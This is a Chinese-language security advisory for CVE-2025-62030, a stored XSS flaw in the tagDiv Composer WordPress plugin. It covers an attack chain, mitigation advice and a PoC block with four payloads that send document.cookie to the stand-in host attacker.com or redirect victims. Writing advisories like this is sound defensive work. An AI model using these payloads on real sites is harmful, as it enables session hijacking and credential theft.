CVE-2025-62030 tagDiv Composer <= 5.4.1 存储型XSS跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-62030

漏洞类型

存储型XSS跨站脚本攻击

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

tagDiv Composer (td-composer)

漏洞概述

CVE-2025-62030是WordPress tagDiv Composer插件中的一个存储型跨站脚本（Stored XSS）漏洞，严重等级为中危（CVSS 6.5）。该漏洞存在于tagDiv Composer插件的5.4.1及以下版本中，由于应用程序在Web页面生成过程中对用户输入的清理和转义处理不当，攻击者可以利用此漏洞在受害者的浏览器中执行任意JavaScript代码。tagDiv Composer是WordPress平台上最受欢迎的页面构建器插件之一，被数以百万计的网站使用。由于该漏洞为存储型XSS，恶意脚本会被永久存储在服务器端，所有访问受影响页面的用户都会受到攻击影响。攻击者通过在插件的输入字段中注入恶意JavaScript代码，当其他用户访问包含该恶意代码的页面时，浏览器会执行这些脚本，从而实现会话劫持、敏感信息窃取、重定向攻击等恶意行为。此漏洞需要认证且具有低权限要求，但需要用户交互才能触发，这使得攻击场景主要集中在已认证用户之间的攻击或社会工程学攻击。

技术细节

该存储型XSS漏洞源于tagDiv Composer插件在处理用户输入时未进行充分的输入验证和输出编码。攻击者可以在插件的特定输入字段中注入包含JavaScript事件处理器（如onerror、onload等）或script标签的恶意代码。由于插件将这些输入内容未经适当转义就直接存储到数据库中，并在后续页面加载时直接输出到HTML中，导致恶意脚本在受害者浏览器中执行。攻击利用过程如下：1）攻击者以低权限用户身份登录WordPress后台；2）在使用tagDiv Composer构建页面时，在支持的输入字段中注入XSS payload，如：<img src=x onerror=alert(document.cookie)>或使用事件处理器触发JavaScript；3）保存页面后，恶意代码被存储到数据库；4）当其他用户（尤其是管理员）访问该页面时，浏览器解析HTML并执行注入的JavaScript代码；5）攻击者可窃取管理员会话Cookie、凭据或其他敏感信息，甚至可能利用管理员权限进一步渗透服务器。由于tagDiv Composer广泛应用于商业网站和企业级WordPress部署，此漏洞对网站安全性构成严重威胁。

攻击链分析

STEP 1

信息收集

攻击者识别目标网站使用WordPress CMS并安装了tagDiv Composer插件，版本<=5.4.1

STEP 2

账户获取

攻击者通过暴力破解、凭据填充或社会工程学获取目标网站的低权限WordPress账户

STEP 3

漏洞利用准备

攻击者构造恶意XSS payload，准备注入到tagDiv Composer的输入字段中

STEP 4

注入恶意代码

使用tagDiv Composer编辑页面或文章，在支持富文本编辑的字段中注入XSS payload

STEP 5

持久化存储

保存页面后，恶意代码被永久存储到WordPress数据库中，无需再次触发

STEP 6

诱导受害者访问

攻击者通过钓鱼邮件、社交媒体或其他渠道诱导管理员或目标用户访问含有恶意代码的页面

STEP 7

脚本执行

受害者浏览器加载页面时，未被转义的JavaScript代码被执行，窃取会话Cookie或执行其他恶意操作

STEP 8

会话劫持

攻击者利用窃取的会话Cookie冒充受害者身份，获取管理员权限或敏感数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Stored XSS PoC for CVE-2025-62030 -->
<!-- Attack Vector: Inject malicious JavaScript via tagDiv Composer input fields -->

<!-- Method 1: Using img tag with onerror event -->
<img src=x onerror=this.src='https://attacker.com/log?cookie='+document.cookie>

<!-- Method 2: Using SVG element -->
<svg onload=fetch('https://attacker.com/steal?data='+btoa(document.cookie))>

<!-- Method 3: Using script tag -->
<script>new Image().src='https://attacker.com/log?c='+document.cookie;</script>

<!-- Method 4: Using body onload event -->
<body onload=document.location='https://attacker.com/redirect?url='+document.URL>

<!-- Example exploitation flow: -->
<!-- 1. Attacker logs in with low-privilege account -->
<!-- 2. Creates/edits page with tagDiv Composer -->
<!-- 3. Inserts XSS payload in vulnerable input field -->
<!-- 4. Saves the page -->
<!-- 5. When admin visits page, XSS executes and steals session -->

<!-- Suggested remediation: Upgrade to version 5.4.2 or later -->

影响范围

tagDiv Composer (td-composer) <= 5.4.1

防御指南

临时缓解措施

立即将tagDiv Composer插件升级到5.4.2或更高版本以修复此漏洞。在无法立即升级的情况下，可以采取以下临时缓解措施：1）禁用或限制tagDiv Composer的编辑功能，仅允许受信任的管理员使用；2）使用WordPress安全插件配置严格的输入过滤规则；3）实施Content Security Policy头部限制脚本执行；4）对所有访问受影响页面的用户实施会话监控；5）考虑临时禁用tagDiv Composer插件直到完成安全更新；6）加强WordPress后台的访问控制，启用双因素认证；7）审查所有使用tagDiv Composer创建的内容页面，移除可疑的注入代码。